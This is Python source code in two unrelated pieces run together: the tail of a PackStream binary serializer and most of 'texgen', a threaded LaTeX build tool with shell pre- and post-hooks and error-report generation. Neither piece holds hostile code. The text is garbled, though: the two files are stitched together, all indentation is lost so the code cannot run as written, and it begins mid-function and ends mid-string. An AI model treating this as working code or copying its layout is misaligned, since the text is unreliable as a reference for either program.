elif size == 0x03:
write(b"\x93")
elif size == 0x04:
write(b"\x94")
elif size == 0x05:
write(b"\x95")
elif size == 0x06:
write(b"\x96")
elif size == 0x07:
write(b"\x97")
elif size == 0x08:
write(b"\x98")
elif size == 0x09:
write(b"\x99")
elif size == 0x0A:
write(b"\x9A")
elif size == 0x0B:
write(b"\x9B")
elif size == 0x0C:
write(b"\x9C")
elif size == 0x0D:
write(b"\x9D")
elif size == 0x0E:
write(b"\x9E")
elif size == 0x0F:
write(b"\x9F")
elif size < 0x100:
write(b"\xD4")
write(PACKED_UINT_8[size])
elif size < 0x10000:
write(b"\xD5")
write(PACKED_UINT_16[size])
elif size < 0x100000000:
write(b"\xD6")
write(struct_pack(">I", size))
else:
raise OverflowError("List header size out of range")
def pack_list_stream_header(self):
self._write(b"\xD7")
def pack_map_header(self, size):
write = self._write
if size == 0x00:
write(b"\xA0")
elif size == 0x01:
write(b"\xA1")
elif size == 0x02:
write(b"\xA2")
elif size == 0x03:
write(b"\xA3")
elif size == 0x04:
write(b"\xA4")
elif size == 0x05:
write(b"\xA5")
elif size == 0x06:
write(b"\xA6")
elif size == 0x07:
write(b"\xA7")
elif size == 0x08:
write(b"\xA8")
elif size == 0x09:
write(b"\xA9")
elif size == 0x0A:
write(b"\xAA")
elif size == 0x0B:
write(b"\xAB")
elif size == 0x0C:
write(b"\xAC")
elif size == 0x0D:
write(b"\xAD")
elif size == 0x0E:
write(b"\xAE")
elif size == 0x0F:
write(b"\xAF")
elif size < 0x100:
write(b"\xD8")
write(PACKED_UINT_8[size])
elif size < 0x10000:
write(b"\xD9")
write(PACKED_UINT_16[size])
elif size < 0x100000000:
write(b"\xDA")
write(struct_pack(">I", size))
else:
raise OverflowError("Map header size out of range")
def pack_map_stream_header(self):
self._write(b"\xDB")
def pack_struct(self, signature, fields):
if len(signature) != 1 or not isinstance(signature, bytes):
raise ValueError("Structure signature must be a single byte value")
write = self._write
size = len(fields)
if size == 0x00:
write(b"\xB0")
elif size == 0x01:
write(b"\xB1")
elif size == 0x02:
write(b"\xB2")
elif size == 0x03:
write(b"\xB3")
elif size == 0x04:
write(b"\xB4")
elif size == 0x05:
write(b"\xB5")
elif size == 0x06:
write(b"\xB6")
elif size == 0x07:
write(b"\xB7")
elif size == 0x08:
write(b"\xB8")
elif size == 0x09:
write(b"\xB9")
elif size == 0x0A:
write(b"\xBA")
elif size == 0x0B:
write(b"\xBB")
elif size == 0x0C:
write(b"\xBC")
elif size == 0x0D:
write(b"\xBD")
elif size == 0x0E:
write(b"\xBE")
elif size == 0x0F:
write(b"\xBF")
else:
raise OverflowError("Structure size out of range")
write(signature)
for field in fields:
self._pack(field)
def pack_end_of_stream(self):
self._write(b"\xDF")
class Unpacker:
def __init__(self, unpackable):
self.unpackable = unpackable
def reset(self):
self.unpackable.reset()
def read(self, n=1):
return self.unpackable.read(n)
def read_u8(self):
return self.unpackable.read_u8()
def unpack(self):
return self._unpack()
def _unpack(self):
marker = self.read_u8()
if marker == -1:
raise ValueError("Nothing to unpack")
# Tiny Integer
if 0x00 <= marker <= 0x7F:
return marker
elif 0xF0 <= marker <= 0xFF:
return marker - 0x100
# Null
elif marker == 0xC0:
return None
# Float
elif marker == 0xC1:
value, = struct_unpack(">d", self.read(8))
return value
# Boolean
elif marker == 0xC2:
return False
elif marker == 0xC3:
return True
# Integer
elif marker == 0xC8:
return struct_unpack(">b", self.read(1))[0]
elif marker == 0xC9:
return struct_unpack(">h", self.read(2))[0]
elif marker == 0xCA:
return struct_unpack(">i", self.read(4))[0]
elif marker == 0xCB:
return struct_unpack(">q", self.read(8))[0]
# Bytes
elif marker == 0xCC:
size, = struct_unpack(">B", self.read(1))
return self.read(size).tobytes()
elif marker == 0xCD:
size, = struct_unpack(">H", self.read(2))
return self.read(size).tobytes()
elif marker == 0xCE:
size, = struct_unpack(">I", self.read(4))
return self.read(size).tobytes()
else:
marker_high = marker & 0xF0
# String
if marker_high == 0x80: # TINY_STRING
return decode(self.read(marker & 0x0F), "utf-8")
elif marker == 0xD0: # STRING_8:
size, = struct_unpack(">B", self.read(1))
return decode(self.read(size), "utf-8")
elif marker == 0xD1: # STRING_16:
size, = struct_unpack(">H", self.read(2))
return decode(self.read(size), "utf-8")
elif marker == 0xD2: # STRING_32:
size, = struct_unpack(">I", self.read(4))
return decode(self.read(size), "utf-8")
# List
elif 0x90 <= marker <= 0x9F or 0xD4 <= marker <= 0xD7:
return list(self._unpack_list_items(marker))
# Map
elif 0xA0 <= marker <= 0xAF or 0xD8 <= marker <= 0xDB:
return self._unpack_map(marker)
# Structure
elif 0xB0 <= marker <= 0xBF:
size, tag = self._unpack_structure_header(marker)
value = Structure(tag, *([None] * size))
for i in range(len(value)):
value[i] = self._unpack()
return value
elif marker == 0xDF: # END_OF_STREAM:
return EndOfStream
else:
raise ValueError("Unknown PackStream marker %02X" % marker)
def _unpack_list_items(self, marker):
marker_high = marker & 0xF0
if marker_high == 0x90:
size = marker & 0x0F
if size == 0:
return
elif size == 1:
yield self._unpack()
else:
for _ in range(size):
yield self._unpack()
elif marker == 0xD4: # LIST_8:
size, = struct_unpack(">B", self.read(1))
for _ in range(size):
yield self._unpack()
elif marker == 0xD5: # LIST_16:
size, = struct_unpack(">H", self.read(2))
for _ in range(size):
yield self._unpack()
elif marker == 0xD6: # LIST_32:
size, = struct_unpack(">I", self.read(4))
for _ in range(size):
yield self._unpack()
elif marker == 0xD7: # LIST_STREAM:
item = None
while item is not EndOfStream:
item = self._unpack()
if item is not EndOfStream:
yield item
else:
return
def unpack_map(self):
marker = self.read_u8()
return self._unpack_map(marker)
def _unpack_map(self, marker):
marker_high = marker & 0xF0
if marker_high == 0xA0:
size = marker & 0x0F
value = {}
for _ in range(size):
key = self._unpack()
value[key] = self._unpack()
return value
elif marker == 0xD8: # MAP_8:
size, = struct_unpack(">B", self.read(1))
value = {}
for _ in range(size):
key = self._unpack()
value[key] = self._unpack()
return value
elif marker == 0xD9: # MAP_16:
size, = struct_unpack(">H", self.read(2))
value = {}
for _ in range(size):
key = self._unpack()
value[key] = self._unpack()
return value
elif marker == 0xDA: # MAP_32:
size, = struct_unpack(">I", self.read(4))
value = {}
for _ in range(size):
key = self._unpack()
value[key] = self._unpack()
return value
elif marker == 0xDB: # MAP_STREAM:
value = {}
key = None
while key is not EndOfStream:
key = self._unpack()
if key is not EndOfStream:
value[key] = self._unpack()
return value
else:
return None
def unpack_structure_header(self):
marker = self.read_u8()
if marker == -1:
return None, None
else:
return self._unpack_structure_header(marker)
def _unpack_structure_header(self, marker):
marker_high = marker & 0xF0
if marker_high == 0xB0: # TINY_STRUCT
signature = self.read(1).tobytes()
return marker & 0x0F, signature
else:
raise ValueError("Expected structure, found marker %02X" % marker)
class UnpackableBuffer:
initial_capacity = 8192
def __init__(self, data=None):
if data is None:
self.data = bytearray(self.initial_capacity)
self.used = 0
else:
self.data = bytearray(data)
self.used = len(self.data)
self.p = 0
def reset(self):
self.used = 0
self.p = 0
def read(self, n=1):
view = memoryview(self.data)
q = self.p + n
subview = view[self.p:q]
self.p = q
return subview
def read_u8(self):
if self.used - self.p >= 1:
value = self.data[self.p]
self.p += 1
return value
else:
return -1
def pop_u16(self):
""" Remove the last two bytes of data, returning them as a big-endian
16-bit unsigned integer.
"""
if self.used >= 2:
value = 0x100 * self.data[self.used - 2] + self.data[self.used - 1]
self.used -= 2
return value
else:
return -1
def receive(self, sock, n_bytes):
end = self.used + n_bytes
if end > len(self.data):
self.data += bytearray(end - len(self.data))
view = memoryview(self.data)
while self.used < end:
n = sock.recv_into(view[self.used:end], end - self.used)
if n == 0:
raise OSError("No data")
self.used += n
class PackStream:
""" Asynchronous chunked message reader/writer for PackStream
messaging.
"""
def __init__(self, reader, writer):
self._reader = reader
self._writer = writer
async def read_message(self):
""" Read a chunked message.
:return:
"""
data = []
more = True
while more:
chunk_header = await self._reader.readexactly(2)
chunk_size, = struct_unpack(">H", chunk_header)
if chunk_size:
chunk_data = await self._reader.readexactly(chunk_size)
data.append(chunk_data)
else:
more = False
buffer = UnpackableBuffer(b"".join(data))
unpacker = Unpacker(buffer)
return unpacker.unpack()
def write_message(self, message):
""" Write a chunked message.
:param message:
:return:
"""
if not isinstance(message, Structure):
raise TypeError("Message must be a Structure instance")
b = BytesIO()
packer = Packer(b)
packer.pack(message)
data = b.getvalue()
# TODO: multi-chunk messages
header = bytearray(divmod(len(data), 0x100))
self._writer.write(header + data + b"\x00\x00")
async def drain(self):
""" Flush the writer.
:return:
"""
await self._writer.drain()
async def close(self):
""" Close.
:return:
"""
self._writer.write_eof()
self._writer.close()
await self._writer.wait_closed() # TODO: fix for < Python 3.7
|
|
#!/usr/bin/env python3
# Created by Jonathan Komar
# 2016-09
# Description:
# Enterprise solution for automated documentation generation.
#
import threading
import queue
import time
import subprocess
import os
import shutil
import sys
import logging,logging.handlers
import re
import getpass
import configparser
import signal
import argparse
app_name = 'texgen'
# Create main (root) logging object
logger = logging.getLogger('{}'.format(__file__))
# Log messages (lowest to highest: DEBUG,INFO,WARN,ERROR,CRITICAL)
logger.setLevel(logging.DEBUG)
# Create console handler that writes logs to terminal early in process
consoleh = logging.StreamHandler(sys.stdout)
# Set Log message level (lowest to highest: DEBUG,INFO,WARN,ERROR,CRITICAL)
consoleh.setLevel(logging.INFO)# default set again in setLogs()
# Define Formats
formatter_file = logging.Formatter('%(asctime)s %(name)s PID: %(process)d TID: %(thread)d %(levelname)s \n ==> %(message)s',datefmt='%Y-%m-%d at %H:%M:%S.%s')
formatter_console = logging.Formatter('\033[0;94m%(asctime)s\033[0m \033[32m%(name)s\033[0m PID: \033[0;32m%(process)d\033[0m TID: \033[0;32m%(thread)d\033[0m %(levelname)s \n \033[0m==>\033[0m\033[1;31m %(message)s\033[1;0m',datefmt='%Y-%m-%d at %H:%M:%S')
# Tell console handler to use this format
consoleh.setFormatter(formatter_console)
# Add Log Handler Objects to the Local Root Logger
logger.addHandler(consoleh)
class TeXGen(): # Class containing methods separate from threader class
def __init__(self,arg_struct):
self.arg_pack = arg_struct
self.thread_pool = []
self.run()
def run(self):
self.argCheck()# Do this early on e.g. output check
if self.arg_pack.daemon == True:
logger.debug('Daemon Mode: {}.'.format(self.arg_pack.daemon))
self.goDaemon()
else: # Oneshot Mode
logger.debug('Daemon Mode: {}.'.format(self.arg_pack.daemon))
self.goOneShot()
class SignalHandler:
def __init__(self, arg_pack, thread_pool):
self.arg_pack = arg_pack
self.thread_pool = thread_pool # not in arg_pack, set by TeXGen obj later
def __call__(self, signum, frame):# implicitly run when object called, obj then requires 2 args
logger.info('\nSignalHandler Received SIGINT. Stopping all threads ASAP!')
self.arg_pack.stop_flag.set()
# for job in self.arg_pack.tex_queue:
# logger.info('SignalHandler: Detected stopflag. Removing {} from the Queue.'.format(job))
# job.task_done()# force empty queue to unblock join
# logger.debug('SignalHandler: Queue is empty: {}'.format(self.arg_pack.tex_queue.empty()))
for thread in self.thread_pool: # loop thru all threads
if thread.isAlive(): # redundant check. alive threads rejoin in run method of TypesetThread at while self.arg_pack.stop_flag.isSet() == False
logger.info('SignalHandler: Detected stopflag. Rejoining {} to the main thread.'.format(thread))
thread.join()# join thread (should not exist due to while loop)
else: # most likely the case
logger.info('SignalHandler: Detected stopflag. Removing {} from the thread pool.'.format(thread))
self.arg_pack.exitcode = 1
def argCheck(self):
if self.arg_pack.output != None:
if not os.path.isdir(self.arg_pack.output):
logger.warning('argCheck: Missing output -o directory: "{}"'.format(self.arg_pack.output))
self.arg_pack.exitcode = 1
else:
self.arg_pack.output = os.path.abspath(self.arg_pack.output)
def goOneShot(self):
logger.debug('goOneShot called.')
tex_input_list = [] # init (arg_pack.input contains either dirs or files, but this list must contain only files)
logger.debug('goOneShot: Recursive check: {}\n Depth: {}'.format(self.arg_pack.recursive,self.arg_pack.depth))
if self.arg_pack.input != None: # should have a dir or file, otherwise help is shown by argparse
if self.arg_pack.recursive is True:# First decide how to make tex_input_list, recursive, then dirs.
for item in self.arg_pack.input:
if os.path.isdir(item):# ensure item is a dir
tex_input_list = self.getFilesRecursively('.*\.tex',item,self.arg_pack.depth[0])
else:
logger.warning('goOneShot: Input with recursion -r must be a directory: "%s"'% (item))
else: # input is a list of files
tex_input_list = self.arg_pack.input
logger.debug('goOneShot: tex_input_list: {}'.format(tex_input_list))
for file in tex_input_list:
if not os.path.isfile(file): # File check
logger.error('goOneShot: File not found: "%s"' % (file))
self.arg_pack.exitcode = 1
return
else:
logger.debug('goOneShot: Found file: %s' % file)
logger.info('Files to process: %s' % (tex_input_list))
else: # no input given
self.arg_pack.exitcode = 1
logger.warning('goOneShot: No files to process.')
return
for tex_file in tex_input_list:
if not os.path.isfile(tex_file): # redundant file check
logger.error('goOneShot: TeX file does not exist: {}'.format(tex_file))
self.arg_pack.exitcode = 1
return
else: # populate tex queue
self.arg_pack.tex_queue.put(tex_file)
# Start the business
if self.arg_pack.iterations[0] > 0:
if self.arg_pack.prehook != None:
self.preHook() # Inject hook
#self.preProcess() # Disabled for the time being. Orig purpose was to grab svn/git repos
signal_handler = self.SignalHandler(self.arg_pack,self.thread_pool)# create signal handler, needs stop_flag,thread_pool
signal.signal(signal.SIGINT, signal_handler)# Connect SIGINT to signal_handler
logger.info('Starting main typesetting phase.')
self.runThreads()
logger.info('Starting postprocessing phase.')
self.postProcess()
if self.arg_pack.posthook != None:
self.postHook() # Inject hook
else:
logger.info("goOneShot: {} iterations, therefore nothing to do".format(self.arg_pack.iterations[0]))
def runThreads(self): # uses self.thread_pool to group of threads. Uses to self.arg_pack.thread_limit know how many thread objects to make
logger.debug('runThreads called.')
#logger.debug('runThreads: thread limit: {}'.format(self.arg_pack.thread_limit[0]))
for item in range(self.arg_pack.thread_limit[0]): # Create as many threads objects as allowed by limit
self.thread_pool.append(TypesetThread(self.arg_pack))# Pass entire arg_pack including tex_queue and stop_flag
logger.info('Thread Pool:\n {}'.format(self.thread_pool))
for i,thread in enumerate(self.thread_pool):# Start threads
logger.debug('runThreads: Starting thread {}:\n {}'.format(i+1,thread))
thread.start()
self.arg_pack.tex_queue.join()# join on Queue object blocks until all items in queue have been fetched and processes i.e. queue is empty. use this to wait before running join loop on thread list.
for i,thread in enumerate(self.thread_pool): # loops number of thread objects
logger.info('runThreads: Joining thread object: {}'.format(thread))
thread.join()# Join thread one by one (None is special)
del self.thread_pool[:] # Empty thread pool list at end of every runThreads call to ensure threads are only started once.
def goDaemon(self):
logger.info('goDaemon called.')
logger.warning('Daemon mode -d has not yet been implemented.')
self.arg_pack.exitcode = 1
def cpFilesToOutput(self):# Stupid mover for lists of files
logger.debug('cpFilesToOutput called.')
clone_list = []
if os.path.isdir(self.arg_pack.output):# First check destination
if self.arg_pack.clean == True:
logger.info('cpFilesToOutput: Clean parameter true. Deleting all files in output directory:\n {}'.format(self.arg_pack.output))
for base,dirs,files in os.walk(self.arg_pack.output, topdown=False):
for file_name in files:
logger.debug('cpFilesToOutput: Removing:\n {}'.format(os.path.join(base,file_name)))
os.remove(os.path.join(base,file_name))
for dir_name in dirs:
logger.debug('cpFilesToOutput: Removing:\n {}'.format(os.path.join(base,dir_name)))
os.rmdir(os.path.join(base,dir_name))
self.arg_pack.completed_queue.put('Sentinel')# Use to force stop iteration of queue
for item_tuple in iter(self.arg_pack.completed_queue.get, 'Sentinel'):# Stop when get yields None
logger.debug('cpFilesToOutput: Temporarily removing from self.arg_pack.completed_queue: {}'.format(item_tuple))
clone_list.append(item_tuple)
item = item_tuple[0]# conv to string
logger.debug('cpFilesToOutput: Processing item: {}'.format(item))
if os.path.isfile(item):# Second check file
if item.endswith('.log') and self.arg_pack.movelogs == False:
logger.debug('cpFilesToOutput: Skipping log: {}'.format(item))
else:
logger.info('Copying "{}" to "{}"'.format(item,self.arg_pack.output))
shutil.copy(item,self.arg_pack.output)
else:
logger.warning('cpFilesToOutput: Could not copy, file not found:\n {}'.format(item))
for item in clone_list:
logger.debug('cpFilesToOutput: Restoring to self.arg_pack.completed_queue: {}'.format(item))
self.arg_pack.completed_queue.put(item)
else:
logger.error('cpFilesToOutput: Destination not found:\n {}'.format(self.arg_pack.output))
def getFilesRecursively(self,regex,base_dir_input='os.path.dirname(os.path.realpath(__file__))',depth=0):
logger.debug('getFilesRecursively: Recursion depth: %s' % (depth))
results_list = [] # init
regex_obj = re.compile(regex) # make regex object
logger.debug('getFilesRecursively:\n Regular Expression: %s\n Base: "%s"\n Depth: %s' % (regex_obj.pattern,base_dir_input,depth))
if os.path.isdir(base_dir_input):
base_dir_input.rstrip(os.path.sep)# ensure depth counter is accurate by removing extraneous /
base_depth = base_dir_input.count(os.path.sep)# set initial base depth
for base, dirs, files in os.walk(base_dir_input): # Collect all tex files recursively
if depth != 0:
try:
depth = int(depth) # redundant test for integer
except:
logger.warning('getFilesRecursively: depth not an integer: %s' % (depth))
current_depth = base.count(os.path.sep)
if current_depth - base_depth <= depth:
for file in files:
file_name = os.path.basename(os.path.normpath(file))
if re.match(regex_obj,file_name):
logger.debug('Appending to results_list: "%s"' % (os.path.join(base,file)))
results_list.append(os.path.join(base,file))
else:# depth is infinity
logger.debug('getFilesRecursively: Depth is 0 (infinity).')
for file in files:
file_name = os.path.basename(os.path.normpath(file))
if re.match(regex_obj,file_name):
logger.debug('Appending to results_list: "%s"' % (os.path.join(base,file)))
results_list.append(os.path.join(base,file))
logger.debug('Results: %s' % (results_list))
return results_list
else:
logger.warning('getFilesRecursively: Not found: "%s"' % (base_dir_input))
self.arg_pack.exitcode = 1
def preProcess(self):
logger.debug('preProcess started. Nothing to do.')
def postProcess(self): # This groups postprocessing routines
logger.debug('postProcess: Called.')
if self.arg_pack.stop_flag.isSet() == False:
# Check parameters for things to be done after compilation complete
if len(self.arg_pack.error_report) > 0:
if os.path.isfile(self.arg_pack.error_report[0]):
self.genErrorReport()# auto adds tasks to tex_queue
else:
logger.error("postProcess: Error Report regular expressions file not found: {}".format(self.arg_pack.error_report[0]))
if len(self.arg_pack.warning_report) > 0:
if os.path.isfile(self.arg_pack.warning_report[0]):
self.genWarningReport()# auto adds tasks to tex_queue
else:
logger.error("postProcess: Warning Report regular expressions file not found: {}".format(self.arg_pack.warning_report[0]))
logger.debug('postProcess: Setting arg_pack.iterations to 2 for report generation.')
self.arg_pack.iterations = [2]
self.runThreads()
if self.arg_pack.output == None:
logger.debug('postProcess: Not moving anything because no output -o directory has been specified.')
else: # Process the move to output dir
if os.path.isdir(self.arg_pack.output):# Redundant output check
logger.debug('postProcess: Detected: output -o detected: "%s"'% (self.arg_pack.output))
else:
logger.error('postProcess: Output -o not found. Creating directory: {}'.format(self.arg_pack.output))
try:
os.makedirs(self.arg_pack.output)
except:
logger.error('postProcess: Could not create output directory: {}'.format(self.arg_pack.output))
self.arg_pack.exitcode = 1
self.cpFilesToOutput()# No need to send list. All needed info contained in self.arg_pack
def preHook(self):
# Adds possibility to run external script beforehand
logger.debug('preHook called.')
for script in self.arg_pack.prehook:
command = "{}".format(script)
logger.info('preHook Executing with 15 second timeout: \n /bin/sh -c {}'.format(command))
process = subprocess.Popen(command,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)# timeout in seconds
process.wait(timeout=15)
proc_stdout, proc_stderr = process.communicate()
if process.returncode == 0:
logger.info('preHook: Process complete: \n Command: /bin/sh -c {}\n STDOUT: "{}"\n STDERR: "{}"\n Exit Code: {}\n at: {}'.format(command,proc_stdout.decode('utf8').strip(),proc_stderr.decode('utf8').strip(),process.returncode,time.time()))
else:
self.arg_pack.exitcode = 1
logger.error('preHook: Process failed: \n Command: /bin/sh -c {}\n STDOUT: "{}"\n STDERR: "{}"\n Exit Code: {}\n at: {}'.format(command,proc_stdout.decode('utf8').strip(), proc_stderr.decode('utf8').strip(),process.returncode,time.time()))
def postHook(self):
# Adds possibility to run external script beforehand
logger.debug('postHook called.')
for script in self.arg_pack.posthook:
command = "{}".format(script)
logger.info('postHook Executing with 15 second timeout: \n /bin/sh -c {}'.format(command))
process = subprocess.Popen(command,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)# timeout in seconds
process.wait(timeout=15)
proc_stdout, proc_stderr = process.communicate()
if process.returncode == 0:
logger.info('postHook: Process complete: \n Command: /bin/sh -c {}\n STDOUT: "{}"\n STDERR: "{}"\n Exit Code: {}\n at: {}'.format(command,proc_stdout.decode('utf8').strip(),proc_stderr.decode('utf8').strip(),process.returncode,time.time()))
else:
self.arg_pack.exitcode = 1
logger.error('postHook: Process failed: \n Command: /bin/sh -c {}\n STDOUT: "{}"\n STDERR: "{}"\n Exit Code: {}\n at: {}'.format(command,proc_stdout.decode('utf8').strip(), proc_stderr.decode('utf8').strip(),process.returncode,time.time()))
def genErrorReport(self):
logger.debug('genErrorReport: Called.')
log_list = []
error_list = []# Append to this to add __ErrorReport__ content
completed_queue_clone_list = []#init
failed_list = []#init
failed_queue_clone_list = []#init
self.arg_pack.completed_queue.put('Sentinel')
for item_tuple in iter(self.arg_pack.completed_queue.get,'Sentinel'):# Stop when get yields None
#logger.debug('genErrorReport: Temporarily removing from self.arg_pack.completed_queue: {}'.format(item_tuple))
completed_queue_clone_list.append(item_tuple)# clone for adding back to completed_queue
item = item_tuple[0]# string conversion
logger.debug('genErrorReport processing:\n "{}"'.format(item))
if item.endswith('.log'):
logger.debug('genErrorReport found log: {}'.format(item))
log_list.append(item)
logger.info('genErrorReport found logs: {}'.format(log_list))
for item in completed_queue_clone_list:# restore completed_queue
self.arg_pack.completed_queue.put(item)
self.arg_pack.failed_queue.put('Sentinel')
for item_tuple in iter(self.arg_pack.failed_queue.get,'Sentinel'):
failed_queue_clone_list.append(item_tuple)# clone for adding back to failed_queue
item = item_tuple[0]
failed_list.append(item)
logger.debug('genErrorReport processing failed .tex file:\n "{}"'.format(item))
for item in failed_queue_clone_list:# restore failed_queue
self.arg_pack.failed_queue.put(item)
# Start process failed_list
if len(self.arg_pack.hook_errors) > 0:
if os.path.isfile(self.arg_pack.hook_errors[0]):
error_list.append("\\section{Hook Errors}")
with open(self.arg_pack.hook_errors[0]) as hook_errors_handler:
for line in hook_errors_handler:
error_list.append(line)
if len(failed_list) > 0: # Process failed tex docs
for failed_item in failed_list:# First see whether any docs failed to build
#logger.debug('genErrorReport: Processing failed document: {}'.format(os.path.splitext(failed_item)[0]))#
logger.info('genErrorReport: Processing failed document: {}'.format(failed_item))
# rm failed tex from log_list
logger.debug('genErrorReport: Grabbing log of failed document log from log_list.\n File: {}'.format(failed_item))
failed_item_log = '{}.log'.format(os.path.splitext(failed_item)[0])
failed_item_escaped = self.escapeTexString(os.path.basename(failed_item))
#log_list.remove(failed_item)
# stuff to implement: grab corresponding log from file from log_list
# print failed document + log to __ErrorReport__
error_list.append('\n\\section{%s}\n\\subsection{Typesetting Failure}' % (failed_item_escaped))# Add headings
error_list.append('\n\\begin{treateachletterasword}')
with open(os.path.splitext(failed_item)[0]+'.log') as texlog_handle:
for line in texlog_handle:
line_escaped = self.escapeTexString(line)
error_list.append('\n%s' % (line_escaped.rstrip()))# Add log.
error_list.append('\n\\end{treateachletterasword}')
# End process failed_list
logger.debug('genErrorReport: arg_pack.error_report: {}'.format(self.arg_pack.error_report[0]))
logger.debug('genErrorReport: Using external pattern file.')
error_pattern_handler = open(self.arg_pack.error_report[0],'r')
pattern_list = []# init
for i,line in enumerate(error_pattern_handler):
pattern_list.append(re.compile(line.rstrip()))
logger.info('genErrorReport: Pattern list: {}'.format(pattern_list))
logger.debug('genErrorReport: Log list: {}'.format(log_list))
if len(log_list) > 0: # For both cases, scan logs
for item in log_list:
if not os.path.isfile(item):
logger.error('genErrorReport: File not found: {}'.format(item))
else:
titled_already = False# Item needs section heading
texlog_handle = open(item,'r')
for i,line in enumerate(texlog_handle):
for pattern in pattern_list:
#logger.debug('Searching for pattern: "{}"'.format(pattern.pattern))
for match in re.finditer(pattern,line):
logger.debug('genErrorReport matched: {}'.format(pattern.pattern))
match_found = True
line_escaped = self.escapeTexString(line)
pattern_escaped = self.escapeTexString(pattern.pattern)
if titled_already == False:
file_name_escaped = self.escapeTexString(item)
error_list.append('\n\\section{%s}\n\\subsection{Regular Expression Match}' % (os.path.basename(file_name_escaped)))
titled_already = True
error_list.append('\n\\begin{itemize}\n\\item Log output line %s is: \\begin{treateachletterasword}%s\\end{treateachletterasword} which matches regular expression \\begin{treateachletterasword}%s\\end{treateachletterasword}\n\\end{itemize}' % (i+1, line_escaped,pattern_escaped) + '\n')
texlog_handle.close()
pre_doc = """\\documentclass{article}
\\usepackage{fontspec}
\\newfontfamily\\monofont{FreeMono.otf}
\\usepackage[includeheadfoot,top=3cm,left=2cm,right=2cm,bottom=2cm]{geometry}
\\usepackage{datetime}
\\usepackage[hidelinks]{hyperref}
\\long\\def\\treateachletterasword{%
\\bgroup
\\XeTeXinterchartokenstate=1% Enable Character Classes (unique to xelatex) 0=off 1=on
\\XeTeXinterchartoks 0 0 = {\\penalty0\\relax}% Set token to be inserted between interchar class 0 and interchar class 0
\\monofont% Set monospaced font
\\setlength{\parindent}{0pt}% Remove new paragraph indentation
\\obeylines% \\catcode`\\^^M\\active \\let ^^M\\par
}%
\\def\\endtreateachletterasword{\\egroup}
\\title{Error Report}
\\date{Typeset \\today{} at \\currenttime{}}
\\author{TeXGen System}
\\begin{document}
\\maketitle{}
\\tableofcontents
\\newpage
"""
post_doc = """
\\end{document}"""
if len(error_list) > 0:
self.arg_pack.exitcode = 1 # ErrorReport only. We want exit of 1 when exists.
logger.error('genErrorReport: Typesetting errors detected. Setting exit code to: {}'.format(self.arg_pack.exitcode))
if self.arg_pack.recursive == True:# Input must be directory
base_dir = os.path.abspath(self.arg_pack.input[0])
error_report_dir = os.path.join(base_dir,'__ErrorReport__')
error_report_file = os.path.join(error_report_dir, '__ErrorReport__.tex')
else:# Non-recursive, file list input, currently same as recursive
base_dir = os.path.abspath(os.path.join(self.arg_pack.input[0],os.pardir))
error_report_dir = os.path.join(base_dir,'__ErrorReport__')
error_report_file = os.path.join(error_report_dir, '__ErrorReport__.tex')
if os.path.isdir(error_report_dir) == True:
logger.warning('genErrorReport: "{}" directory already exists. Directory name adjusted using current time for unique name.'.format(error_report_dir))
error_report_dir = error_report_dir + '{}'.format(time.time())
error_report_file = os.path.join(error_report_dir, '__ErrorReport__{}.tex'.format(time.time()))
os.makedirs(error_report_dir)
f1 = open(error_report_file,'w')
f1.write(pre_doc)
for line in error_list:
f1.write(line)
f1.write(post_doc)
f1.close()
self.arg_pack.tex_queue.put(error_report_file)
def genWarningReport(self):
logger.debug('genWarningReport: Called.')
log_list = []
error_list = []
clone_list = []#init
self.arg_pack.completed_queue.put('Sentinel')
for item_tuple in iter(self.arg_pack.completed_queue.get,'Sentinel'):# Stop when get yields None
#logger.debug('genWarningReport: Temporarily removing from self.arg_pack.completed_queue: {}'.format(item_tuple))
clone_list.append(item_tuple)# clone for adding back to completed_queue
item = item_tuple[0]# string conversion
logger.debug('genWarningReport processing:\n "{}"'.format(item))
if item.endswith('.log'):
logger.debug('genWarningReport found log: {}'.format(item))
log_list.append(item)
logger.info('genWarningReport found logs: {}'.format(log_list))
for item in clone_list:
#logger.debug('genWarningReport: Restoring to self.arg_pack.completed_queue: {}'.format(item))
self.arg_pack.completed_queue.put(item)
#if self.arg_pack.error_report:# use default patterns
# pattern_list = [
# re.compile(r'^Invalid UTF-8 byte or sequence.*'),
# re.compile(r'^Overfull .*'),
# re.compile(r'^Underfull .*'),
# re.compile(r'.*Warning:.*'),
# ]
#else:# use external pattern file
logger.debug('Using external pattern file:\n "{}"'.format(self.arg_pack.warning_report[0]))
warning_pattern_handler = open(self.arg_pack.warning_report[0],'r')
pattern_list = []# init
for i,line in enumerate(warning_pattern_handler):
pattern_list.append(re.compile(line.rstrip()))# There are issues at this step.
logger.info('genWarningReport pattern list: {}'.format(pattern_list))
logger.debug('genWarningReport log list: {}'.format(log_list))
if len(log_list) > 0: # For both cases, scan logs
for item in log_list:
if not os.path.isfile(item):
logger.error('genWarningReport: File not found: {}'.format(item))
else:
titled_already = False# Item needs section heading
texlog_handle = open(item,'r')
for i,line in enumerate(texlog_handle):
for pattern in pattern_list:
#logger.debug('genWarningReport: Searching for pattern: "{}"'.format(pattern.pattern))
for match in re.finditer(pattern,line):
logger.debug('genWarningReport: Matched: {}'.format(pattern.pattern))
match_found = True
line_escaped = self.escapeTexString(line)
pattern_escaped = self.escapeTexString(pattern.pattern)
if titled_already == False:
file_name_escaped = self.escapeTexString(item)
error_list.append('\n\\section{%s}\n\\subsection{Regular Expression Match}' % (os.path.basename(file_name_escaped)))
titled_already = True
error_list.append('\n\\begin{itemize}\n\\item Log output line %s is: \\begin{treateachletterasword}%s\\end{treateachletterasword} which matches regular expression \\begin{treateachletterasword}%s\\end{treateachletterasword}\n\\end{itemize}' % (i+1, line_escaped,pattern_escaped) + '\n')
texlog_handle.close()
pre_doc = """\\documentclass{article}
\\usepackage{fontspec}
\\newfontfamily\\monofont{FreeMono.otf}
\\usepackage[includeheadfoot,top=3cm,left=2cm,right=2cm,bottom=2cm]{geometry}
\\usepackage{datetime}
\\usepackage[hidelinks]{hyperref}
\\long\\def\\treateachletterasword{%
\\bgroup
\\XeTeXinterchartokenstate=1% Enable Character Classes (unique to xelatex) 0=off 1=on
\\XeTeXinterchartoks 0 0 = {\\penalty0\\relax}% Set token to be inserted between interchar class 0 and interchar class 0
\\monofont% Set monospaced font
\\setlength{\parindent}{0pt}% Remove new paragraph indentation
\\obeylines% \\catcode`\\^^M\\active \\let ^^M\\par
}%
\\def\\endtreateachletterasword{\\egroup}
\\title{Warning Report}
\\date{Typeset \\today{} at \\currenttime{}}
\\author{TeXGen System}
\\begin{document}
\\maketitle{}
